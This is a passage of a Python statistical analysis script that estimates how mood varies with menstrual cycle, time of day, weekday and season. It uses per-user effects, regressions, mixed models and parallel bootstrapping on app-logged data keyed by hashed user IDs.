if (n_in_cycle == 0) or (n_in_cycle == n):
cycle_effect = np.nan
else:
cycle_effect = user_d.loc[user_d[boolean_col] == True, 'good_mood'].mean() - \
user_d.loc[user_d[boolean_col] == False, 'good_mood'].mean()
assert ~np.isnan(cycle_effect)
user_results[boolean_col + '_n_obs'] = n_in_cycle
user_results[boolean_col + '_cycle_effect'] = cycle_effect
for covariate_col in COLS_TO_STRATIFY_BY:
user_col_vals = list(set(user_d[covariate_col].dropna()))
if len(user_col_vals) != 1:
user_results[covariate_col] = None
else:
user_results[covariate_col] = user_col_vals[0]
results.append(user_results)
if len(results) % 10000 == 0:
print '%i / %i users examined' % (len(results), total_users)
results_dataframe = pd.DataFrame(results)
for c in results_dataframe.columns:
print 'Column %s has %2.3f%% good values' % (c, 100.*len(results_dataframe[c].dropna()) / len(results_dataframe))
return results
def fast_compute_individual_level_cycle_effects(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect):
"""
    Computes individual-level cycle effects using grouped operations, which is much faster than looping over users one at a time.
Checked.
"""
print("********")
print("Computing individual level cycle effects QUICKLY for %i rows and %i users" % (len(d),
len(set(d['user_id_hash']))))
boolean_cols = ['near_period', 'middle_of_night', 'weekend', 'summer', 'winter']
d = deepcopy(d)
d = add_binary_annotations(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect)
overall_means = d[['user_id_hash', 'good_mood']].groupby('user_id_hash').agg(['mean', 'size'])
overall_means = overall_means.reset_index()
overall_means.columns = ['user_id_hash', 'user_mean', 'n_obs']
for c in boolean_cols:
print(c)
on_cycle_means = d.loc[d[c] == True, ['user_id_hash', 'good_mood']].groupby('user_id_hash').mean()
on_cycle_means = dict(zip(on_cycle_means.index, on_cycle_means['good_mood']))
on_cycle_counts = d.loc[d[c] == True, ['user_id_hash']].groupby('user_id_hash').size()
on_cycle_counts = dict(zip(on_cycle_counts.index, on_cycle_counts.values))
off_cycle_means = d.loc[d[c] == False, ['user_id_hash', 'good_mood']].groupby('user_id_hash').mean()
off_cycle_means = dict(zip(off_cycle_means.index, off_cycle_means['good_mood']))
for k in overall_means['user_id_hash']:
if k not in on_cycle_means:
on_cycle_means[k] = np.nan
if k not in off_cycle_means:
off_cycle_means[k] = np.nan
if k not in on_cycle_counts:
on_cycle_counts[k] = 0
overall_means['%s_cycle_effect' % c] = overall_means['user_id_hash'].map(lambda x:on_cycle_means[x] -
off_cycle_means[x])
overall_means['%s_n_obs' % c] = overall_means['user_id_hash'].map(lambda x:on_cycle_counts[x])
return overall_means
def compute_individual_level_cycle_effects_for_period_by_splitting_into_two_and_taking_median(d):
"""
    Used for computing period effects: for each user, dichotomizes the cycle at the cutoff day
    which maximizes the difference between the pre- and post-cutoff medians.
Checked.
"""
d = deepcopy(d)
print("Computing individual-level effects using median method")
grouped_d = d.groupby('user_id_hash')
print("Done grouping data")
results = []
n_users = len(set(d['user_id_hash']))
n_analyzed = 0
total_users_without_cutoffs = 0
for user, user_d in grouped_d:
user_d = deepcopy(user_d).dropna(subset=['days_after_last_cycle_start'])
if n_analyzed % 100 == 0:
print("Computed effects for %i/%i users" % (n_analyzed, n_users))
n_analyzed += 1
user_d = user_d.sort_values(by='date')
assert (user_d['days_after_last_cycle_start'] >= 0).all()
possible_cutoff_days = range(7, 22)
max_diff = 0
no_valid_cutoffs_found = True
for cutoff_day in possible_cutoff_days:
pre_cutoff_vals = user_d.loc[user_d['days_after_last_cycle_start'] <= cutoff_day, 'good_mood'].values
post_cutoff_vals = user_d.loc[user_d['days_after_last_cycle_start'] > cutoff_day, 'good_mood'].values
if len(pre_cutoff_vals) < 10 or len(post_cutoff_vals) < 10:
continue
diff = np.median(post_cutoff_vals) - np.median(pre_cutoff_vals)
if np.abs(diff) >= np.abs(max_diff):
no_valid_cutoffs_found = False
max_diff = diff
max_day = cutoff_day
total_users_without_cutoffs += no_valid_cutoffs_found
if no_valid_cutoffs_found:
print("Median effect could not be computed for this user:")
print user_d[['days_after_last_cycle_start', 'good_mood']].to_string()
continue
results.append({'user_id_hash':user,
'period_cycle_effect':max_diff,
'n_obs':len(user_d),
'user_mean':user_d['good_mood'].mean(),
'cutoff_day':max_day})
print("Total users without valid cutoffs (for whom no median effect could be computed: %i" % total_users_without_cutoffs)
return results
def find_person_specific_interactions_between_cycles(d, min_n = 20, min_in_group = 3, start_day_for_period_individual_effect=None, end_day_for_period_individual_effect=None):
"""
Looks for correlations between cycle strength across people: eg, do people with larger PMS
swings have larger midnight swings?
Do not need to remove individual mean because we are comparing individuals to themselves anyway.
Checked.
"""
boolean_cols = ['near_period', 'middle_of_night', 'weekend', 'summer', 'winter']
d = deepcopy(d)
d = add_binary_annotations(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect)
grouped_d = deepcopy(d).groupby('user_id_hash')
results = {}
for i in range(len(boolean_cols)):
for j in range(i):
key = '%s*%s' % (boolean_cols[i], boolean_cols[j])
cycle_i_effects = []
cycle_j_effects = []
if boolean_cols[i] == 'winter' and boolean_cols[j] == 'summer':
# singular matrix (these are mutually exclusive)
continue
for user, user_d in grouped_d:
n = len(user_d)
# identify number of observations we have for each cycle.
i_true = user_d[boolean_cols[i]].sum()
j_true = user_d[boolean_cols[j]].sum()
# skip people who don't have enough good data (total count or count in each cycle group)
if n < min_n:
continue
if (i_true < min_in_group) or (n - i_true < min_in_group):
continue
if (j_true < min_in_group) or (n - j_true < min_in_group):
continue
cycle_i_effect = user_d.loc[user_d[boolean_cols[i]] == True, 'good_mood'].mean() - user_d.loc[user_d[boolean_cols[i]] == False, 'good_mood'].mean()
cycle_j_effect = user_d.loc[user_d[boolean_cols[j]] == True, 'good_mood'].mean() - user_d.loc[user_d[boolean_cols[j]] == False, 'good_mood'].mean()
cycle_i_effects.append(cycle_i_effect)
cycle_j_effects.append(cycle_j_effect)
r, p = pearsonr(cycle_i_effects, cycle_j_effects)
print '%s mean: %2.3f; %s mean %2.3f; correlation %2.3f; p %2.3e, n = %i' % (boolean_cols[i], \
np.mean(cycle_i_effects), \
boolean_cols[j], \
np.mean(cycle_j_effects), \
r, p, \
len(cycle_i_effects))
results[key] = {'mu_1':np.mean(cycle_i_effects), \
'mu_2':np.mean(cycle_j_effects), \
'r':r, \
'p':p, \
'n':len(cycle_i_effects), \
'full_effects_1':cycle_i_effects, \
'full_effects_2':cycle_j_effects}
return results
def compute_most_likely_derivatives(user_data, max_timestep):
"""
Given user data (a list of dictionaries with 'y' and 't' for each user)
and a maximum timestep, returns estimates of the derivatives.
Checked. Works on a bunch of simulated datasets.
Minimizes a least-squares objective ||A*delta - (y1 - y0)||^2 where A is a design matrix
delta is the vector of discrete derivatives we're solving for
and (y1 - y0) is the change in y.
"""
user_data = deepcopy(user_data)
user_data = [a for a in user_data if len(a['y']) >= 2] # can only use data with at least two timepoints.
total_datapoints = sum([len(user_data_i['y']) for user_data_i in user_data]) # number of rows in A matrix.
# the jth column corresponds to delta_j, ie, the derivative from t_j to t_j + 1, starting at j=0.
# If j = max_timestep, this is derivative from t_max_timestep to 0 (ie, loop back around).
A = np.zeros([total_datapoints, max_timestep + 1])
print 'Shape of original user data is', A.shape
row_idx = 0
y1_minus_y0 = [] # this is the target we're trying to hit: the change in y.
# Each entry is the user's value at the end of the time period minus their value at the beginning.
loop_around_rows = [] # these rows correspond to looping back and completing the cycle. Each user has one row.
# Not sure we want to include these rows in the computation. Including yields similar but non-identical results
# for noisy data (for perfect data, results are identical). We return computations performed both ways.
all_unique_timesteps = set()
for i in range(len(user_data)):
y_i = np.array(user_data[i]['y'])
t_i = np.array(user_data[i]['t'])
for t_ij in t_i:
all_unique_timesteps.add(t_ij)
assert len(y_i) == len(t_i) # timestamps should be equal in length to observations
assert len(set(t_i)) == len(t_i) # timestamps should be unique.
user_start_row = row_idx
for j in range(len(y_i) - 1): # -1 because we compare each timestep to the next timestep.
col_start_idx = t_i[j]
col_stop_idx = t_i[j + 1]
assert col_stop_idx > col_start_idx # timesteps should be in sorted order.
A[row_idx, col_start_idx:col_stop_idx] = 1
y1_minus_y0.append(y_i[j + 1] - y_i[j])
row_idx += 1
loop_around_rows.append(False)
# add loop around row, one for each user.
A[row_idx, t_i[-1]:] = 1
A[row_idx, :t_i[0]] = 1
assert A[user_start_row:(row_idx + 1), :].sum() == (max_timestep + 1) # each user should have exactly this many nonzero entries.
y1_minus_y0.append(y_i[0] - y_i[-1])
loop_around_rows.append(True)
row_idx += 1
assert set(all_unique_timesteps) == set(range(max_timestep + 1)) # we should have observations for every timestep.
assert (A.sum(axis=1) > 0).all() # all rows of A should be nonzero.
assert set(A.sum(axis=0)) == set([len(user_data)]) # all columns of A should add up to the number of users.
assert len(A) == len(y1_minus_y0) # make sure shapes are correct.
assert len(loop_around_rows) == len(y1_minus_y0)
loop_around_rows = np.array(loop_around_rows)
y1_minus_y0 = np.atleast_2d(np.array(y1_minus_y0)).transpose()
beta_with_looparound_rows, _, _, _ = np.linalg.lstsq(A, y1_minus_y0)
beta_without_looparound_rows, _, _, _ = np.linalg.lstsq(A[~loop_around_rows, :], y1_minus_y0[~loop_around_rows])
# remove looparound entry since we wouldn't use it anyway
beta_with_looparound_rows = beta_with_looparound_rows[:-1]
beta_without_looparound_rows = beta_without_looparound_rows[:-1]
print 'absolute difference in derivative estimates'
print np.abs(beta_with_looparound_rows - beta_without_looparound_rows)
return beta_with_looparound_rows, beta_without_looparound_rows
def do_derivative_estimation_on_real_data(d, cycle_column):
"""
runs the above method (which is designed for general, abstract data) on real data.
Checked.
"""
assert cycle_column in ['local_hour', 'weekday', 'date_relative_to_period', 'month']
n_unique_users = len(set(d['user_id_hash']))
user_data = []
d = deepcopy(d)
if cycle_column == 'weekday':
weekdays = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
weekdays_to_numbers = dict(zip(weekdays, range(len(weekdays))))
d['numeric_weekday'] = d['weekday'].map(lambda x:weekdays_to_numbers[x])
cycle_column = 'numeric_weekday'
cycle_start = d[cycle_column].min()
cycle_end = d[cycle_column].max()
all_cycle_vals = sorted(list(set(d[cycle_column])))
assert np.isnan(d[cycle_column]).sum() == 0
if cycle_column == 'local_hour':
assert (cycle_start == 0) and (cycle_end == 23)
assert all_cycle_vals == range(24)
    elif cycle_column == 'numeric_weekday':  # 'weekday' was remapped to 'numeric_weekday' above
assert (cycle_start == 0) and (cycle_end == 6)
assert all_cycle_vals == range(7)
elif cycle_column == 'date_relative_to_period':
# two different filters might potentially be used.
assert (cycle_start == -14 and cycle_end == 14) or (cycle_start == -20 and cycle_end == 20)
assert (all_cycle_vals == range(-14, 15)) or (all_cycle_vals == range(-20, 21))
elif cycle_column == 'month':
assert (cycle_start == 1) and (cycle_end == 12)
assert (all_cycle_vals == range(1, 13))
print 'Original data for cycle %s ranges from %i to %i' % (cycle_column, cycle_start, cycle_end)
d['cycle_timestep'] = d[cycle_column].map(lambda x:int(x - cycle_start))
min_timestep = d['cycle_timestep'].min()
max_timestep = d['cycle_timestep'].max()
print 'New cycle timestep range is %i to %i' % (min_timestep, max_timestep)
grouped_by_user = d[['user_id_hash', 'cycle_timestep', 'good_mood']].groupby(['user_id_hash'])
n_users_read = 0
for user_id, user_d in grouped_by_user:
means_by_user_and_cycle_timestep = user_d.groupby('cycle_timestep').mean() * 1.0
user_data.append({'t':list(means_by_user_and_cycle_timestep.index),
'y':list(means_by_user_and_cycle_timestep['good_mood'].values)})
n_users_read += 1
if n_users_read % 10000 == 0:
print '%i / %i users read' % (n_users_read, n_unique_users)
derivative_with_looparound, derivative_without_looparound = compute_most_likely_derivatives(
user_data=user_data,
max_timestep=max_timestep)
def get_function_from_derivative(derivative_vector):
"""
small helper method to integrate a derivative. Starts at 0, adds the derivative at each timestep.
Y will end up being 1 longer than the derivative vector, which makes sense. So eg if max_timestep=3,
the derivative will have 3 entries (delta_0, delta_1, delta_2) and Y will have 4 (Y_0, Y_1, Y_2, Y_3).
Checked.
"""
y = [0]
for i in range(len(derivative_vector)):
y0 = y[-1]
y.append(derivative_vector[i] + y0)
y = np.array(y)
y = y - np.mean(y)
return y
looparound_estimated_cycle_values = get_function_from_derivative(derivative_with_looparound)
no_looparound_estimated_cycle_values = get_function_from_derivative(derivative_without_looparound)
if cycle_column != 'numeric_weekday':
true_cycle_timesteps = all_cycle_vals
else:
true_cycle_timesteps = weekdays
# put data into format for four cycle plots.
looparound_df = pd.DataFrame({'mean':looparound_estimated_cycle_values, 'size':1e12,'std':0,'err':0, 'looparound':True})
looparound_df.index = true_cycle_timesteps
no_looparound_df = pd.DataFrame({'mean':no_looparound_estimated_cycle_values, 'size':1e12,'std':0,'err':0, 'looparound':False})
no_looparound_df.index = true_cycle_timesteps
return looparound_df, no_looparound_df
def estimate_derivatives_for_all_four_types_of_cycles(d):
"""
Loops over all four types of cycles and computes derivatives for each. Checked.
"""
print 'Estimating derivatives for all four types of cycles'
d = deepcopy(d)
looparound_results = {}
no_looparound_results = {}
print 'Computing derivatives for period with 14-day span'
looparound_results['date_relative_to_period'], no_looparound_results['date_relative_to_period'] = do_derivative_estimation_on_real_data(
d.loc[d['date_relative_to_period'].map(lambda x:np.abs(x) <= 14)],
cycle_column = 'date_relative_to_period')
print 'Computing derivatives for period with 20-day span'
looparound_results['period_20'], no_looparound_results['period_20'] = do_derivative_estimation_on_real_data(d, cycle_column = 'date_relative_to_period')
for cycle_column in ['weekday', 'month', 'local_hour']:
print 'Computing derivatives for %s' % cycle_column
looparound_results[cycle_column], no_looparound_results[cycle_column] = do_derivative_estimation_on_real_data(d,cycle_column = cycle_column)
return looparound_results, no_looparound_results
def fit_linear_regression(d, covariates_for_regression):
"""
    Checked. Performs a linear regression of good_mood on the supplied covariates (by default year, month,
    weekday, local hour, and day relative to period), after removing individual means.
    This regression is NOT analogous to the logistic regression below.
"""
for c in covariates_for_regression:
if c != 'days_since_start':
assert c[:2] == 'C('
if c == 'C(date_relative_to_period)':
raise Exception("This is deprecated; you want to set the base level as 0. Correct covariate is C(date_relative_to_period, Treatment(reference=0))")
t0 = time.time()
print("Performing linear regression. First removing individual means.")
d = deepcopy(d)
d['year'] = d['date'].map(lambda x:x.split('-')[0])
assert d['year'].map(lambda x:x in ['2015', '2016', '2017']).all()
d = remove_individual_means_from_df(d)
d = d.dropna(subset=[a.replace(')', '').replace('C(', '').split(', Treatment')[0] for a in covariates_for_regression])
model = sm.OLS.from_formula('good_mood ~ %s' % ('+'.join(covariates_for_regression)), data = d).fit(cov_type='cluster', cov_kwds={'groups':d['user_id_hash']})
print model.summary()
model_results = {'params':model.params, 'pvalues':model.pvalues, '95_CI':model.conf_int(), 'covariance_matrix':model.cov_params()}
print "Total time to perform linear regression: %2.3f seconds" % (time.time() - t0)
return model_results
def replace_elem_in_list(l, old, new):
new_l = []
assert new not in l
for i in range(len(l)):
if l[i] == old:
new_l.append(new)
else:
new_l.append(l[i])
return new_l
def fit_regression_with_alternate_period_specifications(d, covariates_for_regression):
# add extra column for how far someone is through their cycle.
print("Computing alternate period regression specifications")
print("Original covariates were")
print(covariates_for_regression)
d = deepcopy(d)
print d[['mean_cycle_length']].describe()
assert (d['mean_cycle_length'] < 7).sum() == 0
d['frac_through_cycle'] = d['date_relative_to_period'] / d['mean_cycle_length'].map(lambda x:x if x is not None else 1)
d.loc[pd.isnull(d['mean_cycle_length']), 'frac_through_cycle'] = None
d['frac_through_cycle'] = d['frac_through_cycle'].map(lambda x:math.floor(x * 28) / 28.)
d.loc[d['frac_through_cycle'].map(lambda x:np.abs(x) > .5), 'frac_through_cycle'] = None
print("Fraction of binned_frac cycle set to None: %2.3f" % np.mean(pd.isnull(d['frac_through_cycle'])))
val_counts = Counter(d['frac_through_cycle'].dropna())
assert len(val_counts) == 29
for val in sorted(val_counts.keys())[::-1]:
print("%s: %2.1f%% of non-missing values (%i)" % (val, 100.*val_counts[val]/len(d['frac_through_cycle'].dropna()), val_counts[val]))
# actually fit regressions
results = {}
for alternate_specification in ['days_after_last_cycle_start', 'days_before_next_cycle_start', 'frac_through_cycle']:
if alternate_specification == 'days_after_last_cycle_start':
alternate_specification_and_ref_level = 'C(days_after_last_cycle_start, Treatment(reference=0))'
elif alternate_specification == 'days_before_next_cycle_start':
alternate_specification_and_ref_level = 'C(days_before_next_cycle_start, Treatment(reference=-40))'
else:
alternate_specification_and_ref_level = 'C(frac_through_cycle, Treatment(reference=-0.5))'
results['with_period_parameterization_%s' % alternate_specification] = fit_linear_regression(d,
replace_elem_in_list(covariates_for_regression,
'C(date_relative_to_period, Treatment(reference=0))',
alternate_specification_and_ref_level))
return results
def fit_regression_with_alternate_seasonal_specifications(d, covariates_for_regression):
# Add some extra columns.
print("Computing alternate seasonal regression specifications")
print("Original covariates were")
print(covariates_for_regression)
d = deepcopy(d)
d['datetime'] = d['date'].map(lambda x:datetime.datetime.strptime(x, '%Y-%m-%d'))
# annotate with a grouped variable based on day of year. Eg, if bandwidth = 7
# this roughly corresponds to week of year.
def get_day_grouping(x, bandwidth):
day_of_year = int(x.strftime('%j'))
grouping = int(math.floor(1.*day_of_year / bandwidth))
return grouping
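    # For illustration: with bandwidth = 7, day_of_year = 8 falls in grouping 1 (floor(8 / 7)) and
    # day_of_year = 365 falls in grouping 52; the final, very short grouping is merged into the
    # previous one just below so that no "week" contains only a day or two.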
d['week_of_year'] = d['datetime'].map(lambda x:get_day_grouping(x, 7))
max_week_val = d['week_of_year'].max()
# keep from having super-short weeks
d.loc[d['week_of_year'] == max_week_val, 'week_of_year'] = max_week_val - 1
print("Week of year ranges from %i-%i" % (d['week_of_year'].min(), d['week_of_year'].max()))
# annotate with start date so we can fit a linear trend.
start_date = d['datetime'].min()
d['days_since_start'] = d['datetime'].map(lambda x:(x - start_date).days)
assert (d['days_since_start'] >= 0).all()
print("Days since start ranges from %i-%i" % (d['days_since_start'].min(), d['days_since_start'].max()))
# actually fit regressions
results = {}
results['with_week_of_year_instead_of_month'] = fit_linear_regression(d,
replace_elem_in_list(covariates_for_regression, 'C(month)', 'C(week_of_year)'))
results['with_days_since_start_instead_of_year'] = fit_linear_regression(d,
replace_elem_in_list(covariates_for_regression, 'C(year)', 'days_since_start'))
results['swap_out_both'] = fit_linear_regression(d,
replace_elem_in_list(
replace_elem_in_list(covariates_for_regression, 'C(year)', 'days_since_start'),
'C(month)', 'C(week_of_year)'))
return results
def bootstrapped_analyses_one_process(d,
bootstrap_regression_amplitude_errorbars,
bootstrap_regressions_of_period_effects,
bootstrap_daily_time_series,
regression_amplitude_kwargs,
period_effects_kwargs,
bootstrap_seeds,
return_dict):
"""
    Parallelize bootstrapping - this is the single-process helper method.
bootstrap_regression_amplitude_errorbars, bootstrap_regressions_of_period_effects, bootstrap_daily_time_series are
boolean flags which specify which analyses we actually have to run. kwargs specify kwargs for these analyses.
    bootstrap_seeds specifies which seeds to use to select user_id_hashes, and return_dict lets us store the data for multiprocessing.
"""
grouped_d = d.groupby('user_id_hash')
unique_user_ids = sorted(list(set(d['user_id_hash'])))
for iterate in range(len(bootstrap_seeds)):
seed = bootstrap_seeds[iterate]
reproducible_random_sampler = random.Random(seed)
results_for_iterate = {'linear_regression_bootstrapped_iterates':None,
'period_effects_with_covariates':None,
'daily_time_series_no_individual_mean':None}
print("Multithreaded bootstrap iterate %i/%i, seed %i" % (iterate + 1, len(bootstrap_seeds), seed))
t0 = time.time()
sampled_ids = [reproducible_random_sampler.choice(unique_user_ids) for i in unique_user_ids] # sample with replacement
bootstrapped_d = pd.concat([grouped_d.get_group(user) for user in sampled_ids])
bootstrapped_d.index = range(len(bootstrapped_d))
t1 = time.time()
if bootstrap_regression_amplitude_errorbars:
results_for_iterate['linear_regression_bootstrapped_iterates'] = fit_linear_regression(bootstrapped_d, **regression_amplitude_kwargs)
if bootstrap_regressions_of_period_effects:
results_for_iterate['period_effects_with_covariates'] = fit_regression_of_period_effects(bootstrapped_d, **period_effects_kwargs)
if bootstrap_daily_time_series:
results_for_iterate['daily_time_series_no_individual_mean'] = compute_means_by_date(bootstrapped_d, remove_individual_means=True)
print("Time to compute bootstrapped dataframe: %2.3f seconds; time to do analysis %2.3f seconds" % (t1 - t0, time.time() - t1))
return_dict[seed] = results_for_iterate
gc.collect()
def do_all_bootstrapped_analyses(d,
bootstrap_regression_amplitude_errorbars,
bootstrap_regressions_of_period_effects,
bootstrap_daily_time_series,
n_iterates,
regression_amplitude_kwargs,
period_effects_kwargs,
n_processes_to_use=25):
"""
Manager job for parallelizing bootstrap analyses.
"""
manager = Manager()
return_dict = manager.dict()
processes = []
chunk_size = int(n_iterates / n_processes_to_use)
all_bootstrap_seeds = []
for process_idx in range(n_processes_to_use):
if process_idx < n_processes_to_use - 1:
bootstrap_seeds = range(process_idx * chunk_size, (process_idx + 1) * chunk_size)
else:
bootstrap_seeds = range(process_idx * chunk_size, n_iterates)
all_bootstrap_seeds += bootstrap_seeds
args = [d,
bootstrap_regression_amplitude_errorbars,
bootstrap_regressions_of_period_effects,
bootstrap_daily_time_series,
regression_amplitude_kwargs,
period_effects_kwargs,
bootstrap_seeds,
return_dict]
p = Process(target=bootstrapped_analyses_one_process, args=tuple(args))
processes.append(p)
print("Process %i has %i seeds (%i-%i)" % (process_idx, len(bootstrap_seeds), min(bootstrap_seeds), max(bootstrap_seeds)))
time.sleep(5)
for process in processes:
process.start()
for process in processes:
process.join()
assert all_bootstrap_seeds == range(n_iterates)
assert len(return_dict.keys()) == n_iterates
bootstrapped_results = []
for i in range(n_iterates):
bootstrapped_results.append(return_dict[i])
print("Completed all processes")
return bootstrapped_results
def fit_regression_of_period_effects(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect, min_obs_for_group, min_users_for_group, specifications=None):
"""
Examines how much the period effect varies based on various covariates.
In the simple univariate case (eg, good_mood ~ near_period * C(country)) the estimates are the same as the
binary effects estimated by binary_analysis_no_individual_mean.
"""
print("Performing linear regression of binarized period effects. First removing individual means.")
d = deepcopy(d)
d['year'] = d['date'].map(lambda x:x.split('-')[0])
assert d['year'].map(lambda x:x in ['2015', '2016', '2017']).all()
d = remove_individual_means_from_df(d)
d = add_binary_annotations(d, start_day_for_period_individual_effect, end_day_for_period_individual_effect)
assert pd.isnull(d['country']).sum() == 0
good_vals_for_group = {}
for grouping in ['categorical_age', 'country']:
good_vals_for_group[grouping] = set()
grouped_d = d.groupby(grouping)
for group_id, group_df in grouped_d:
n_obs = len(group_df)
n_users = len(set(group_df['user_id_hash']))
if n_obs >= min_obs_for_group and n_users >= min_users_for_group:
good_vals_for_group[grouping].add(group_id)
else:
print("Not producing estimates for group %s=%s because too few users (%i) or observations (%i)" % (grouping,
group_id, n_users, n_obs))
#good_country_idxs = d['country'].map(lambda x:x in good_vals_for_group['country'])
#good_age_idxs = pd.isnull(d['categorical_age']) | d['categorical_age'].map(lambda x:x in good_vals_for_group['categorical_age'])
#print("Prior to removing very rare values of country and group, %i values" % len(d))
#d = d.loc[good_age_idxs & good_country_idxs]
#d.index = range(len(d))
#print("After removing very rare values of country and group, %i values" % len(d))
# While we use all datapoints for fitting, we only generate estimates for an age group or country if we have enough datapoints in the group.
all_age_groups_to_generate_estimates_for = [a for a in sorted(list(set(d['categorical_age'].dropna()))) if a in good_vals_for_group['categorical_age']]
all_country_groups_to_generate_estimates_for = [a for a in sorted(list(set(d['country']))) if a in good_vals_for_group['country']]
all_results = {}
behavior_controls = ['logged_any_alcohol',
'logged_any_cigarettes',
'logged_any_exercise',
'logged_birth_control_pill',
'logged_hormonal_birth_control',
'logged_iud']
app_usage_controls = ['n_symptom_categories_used', 'start_year', 'total_symptoms_logged']
if specifications is None:
specifications = ['near_period']
for cov_set in [['country'],
['categorical_age'],
['country', 'categorical_age'],
['country', 'categorical_age'] + behavior_controls,
['country', 'categorical_age'] + behavior_controls + app_usage_controls]:
specifications.append('+'.join(['near_period*C(%s)' % cov for cov in cov_set]))
    # sample a small subset to predict on. 100000 rows should give values very close to the full-data ones but is much faster.
    # We fit the model on the whole dataset; we just use the small sample when computing the predicted period effects.
n_points_to_sample = min(len(d), 100000)
random_idxs = random.sample(range(len(d)), n_points_to_sample)
data_to_predict_on = deepcopy(d.iloc[random_idxs])
data_to_predict_on.index = range(len(data_to_predict_on))
original_ages = deepcopy(data_to_predict_on['categorical_age'].values)
original_countries = deepcopy(data_to_predict_on['country'].values)
for specification in specifications:
print("Results for %s" % specification)
t0 = time.time()
model = sm.OLS.from_formula('good_mood ~ %s' % specification, data = d).fit()
model_results = {'params':model.params, 'pvalues':model.pvalues, '95_CI':model.conf_int()}
all_results[specification] = {}
all_results[specification]['model_results'] = model_results
# loop over countries + ages and make predictions for each.
for col_to_alter in ['categorical_age', 'country']:
print("Computing expected period effects for %s" % col_to_alter)
predicted_effects_by_group = {}
if col_to_alter == 'categorical_age':
groups_to_loop_over = all_age_groups_to_generate_estimates_for
original_values = deepcopy(original_ages)
else:
groups_to_loop_over = all_country_groups_to_generate_estimates_for
original_values = deepcopy(original_countries)
for group in groups_to_loop_over:
data_to_predict_on[col_to_alter] = group
data_to_predict_on['near_period'] = False
off_period_predictions = model.predict(data_to_predict_on)
data_to_predict_on['near_period'] = True
on_period_predictions = model.predict(data_to_predict_on)
predicted_effect = on_period_predictions.mean() - off_period_predictions.mean()
print("Predicted average period effect for specification %s, %s=%s: %2.3f" % (specification,
col_to_alter,
group,
predicted_effect))
predicted_effects_by_group[group] = predicted_effect
data_to_predict_on[col_to_alter] = deepcopy(original_values) # put things back the way they were before
all_results[specification]['predicted_effects_by_%s' % col_to_alter] = predicted_effects_by_group
print("Time to run regression: %2.3f seconds" % (time.time() - t0))
return all_results
def extract_results_from_statsmodels_ranef_model(model):
# do not want model.params. https://github.com/statsmodels/statsmodels/issues/3532
print(model.summary())
results = {'random_effects_covariance':model.cov_re,
'random_effects_covariance_errors':model.bse_re,
'fixed_effects_coefficients':model.fe_params,
'fixed_effects_standard_errors':model.bse_fe,
'ranef':model.random_effects}
for k in ['fixed_effects_coefficients',
'fixed_effects_standard_errors',
'random_effects_covariance',
'random_effects_covariance_errors']:
if k != 'ranef':
print k, '\n', results[k].to_string()
return results
def fit_mixed_model_regression(d, n_people_to_fit_on, covariates_for_regression, min_obs_per_user=1, use_lme4=False):
"""
subsamples a dataset to fit a mixed model regression on. Robustness check.
"""
for c in covariates_for_regression:
assert c[:2] == 'C('
t0 = time.time()
print("Performing mixed model regression (with individual fixed effects) for %i people" % n_people_to_fit_on)
user_obs_counts = Counter(d['user_id_hash'])
potential_users_to_sample = [user for user in user_obs_counts.keys() if user_obs_counts[user] >= min_obs_per_user]
print("After filtering out users with fewer than %i obs, %i/%i users remain" % (min_obs_per_user,
len(potential_users_to_sample),
len(user_obs_counts.keys())))
n_people_to_fit_on = min(len(potential_users_to_sample), n_people_to_fit_on)
random_users = set(random.sample(list(potential_users_to_sample), n_people_to_fit_on))
small_d = deepcopy(d.loc[d['user_id_hash'].map(lambda x:x in random_users)])
print("Total number of users: %i; total number of rows %i" % (len(set(small_d['user_id_hash'])), len(small_d)))
small_d['year'] = small_d['date'].map(lambda x:x.split('-')[0])
assert small_d['year'].map(lambda x:x in ['2015', '2016', '2017']).all()
cols_to_examine = ['good_mood', 'year', 'month', 'weekday', 'local_hour', 'date_relative_to_period', 'user_id_hash']
assert len(small_d[cols_to_examine].dropna()) == len(small_d)
assert np.isfinite(small_d['good_mood']).all()
print 'fitting OLS model as a test'
ols_model_to_test = sm.OLS.from_formula('good_mood ~ %s' % ('+'.join(covariates_for_regression)), data=small_d).fit()
print 'Params that do not have user id hash'
print ols_model_to_test.params.loc[ols_model_to_test.params.index.map(lambda x:'user_id_hash' not in x)]
print("Maximum absolute value of the parameters in the ols model: %2.3f" % np.abs(ols_model_to_test.params).max())
print small_d[cols_to_examine].head()
for c in cols_to_examine:
assert pd.isnull(small_d[c]).sum() == 0
print '%s ranges from %s to %s, %i unique values' % (c, small_d[c].min(), small_d[c].max(), len(set(small_d[c])))
if not use_lme4:
#raise Exception("This is deprecated and not guaranteed to work.")
print("Now fitting mixed model using statsmodels!")
model = smf.mixedlm('good_mood ~ %s' % ('+'.join(covariates_for_regression)),
small_d,
groups = small_d["user_id_hash"])
fit_results = model.fit(method='cg')
print fit_results.summary()
print 'Model.score applied to params_object'
print model.score(fit_results.params_object)
model_results = extract_results_from_statsmodels_ranef_model(fit_results)
else:
print("Fitting mixed model regression using R!")
# confirmed that the fixed effects look similar to statsmodels and the extracted pandas dataframe
# look similar to the R summary.
import rpy2.robjects as robjects
from rpy2.robjects.packages import importr
from rpy2.robjects import pandas2ri
import warnings
#from rpy2.robjects.conversion import localconverter
raise Exception("Not working at present. Maybe see here: https://stackoverflow.com/questions/42127093/how-to-use-the-r-with-operator-in-rpy2/42127457")
print("Doing R imports")
base = importr('base')
nlme = importr('nlme')
lme4 = importr('lme4')
print("Activating pandas2ri")
pandas2ri.activate()
print("Turning warnings on")
robjects.r('options(warn=1)') # we want to know about it if R throws warnings, so we set the warning flag high.
small_d.index = range(len(small_d))
# put strings into R format. This is a pain, because I don't know how to properly deal with factors in R to Python conversion.
for i in range(len(covariates_for_regression)):
covariates_for_regression[i] = covariates_for_regression[i].replace('C(', '').replace(')', '').split(', Treatment')[0] # split is for date_relative_to_period, we want to remove it.
if covariates_for_regression[i] == 'date_relative_to_period':
desired_period_vals = range(-20, 21)
assert sorted(list(set(small_d[covariates_for_regression[i]]))) == desired_period_vals
# truly terrible hack: map original values to ascii strings
# the reason we do this is to make sure the base level is correct.
# we want it to be 0.
# so base level must be lexicographically first.
                # so we take the first 21 letters of the alphabet in reverse order
                # (u, t, ..., a) and then add on A, B, C, D, ...
# the key point is that the 21st letter must be lexicographically first.
# because this corresponds to date_relative_to_period = 0
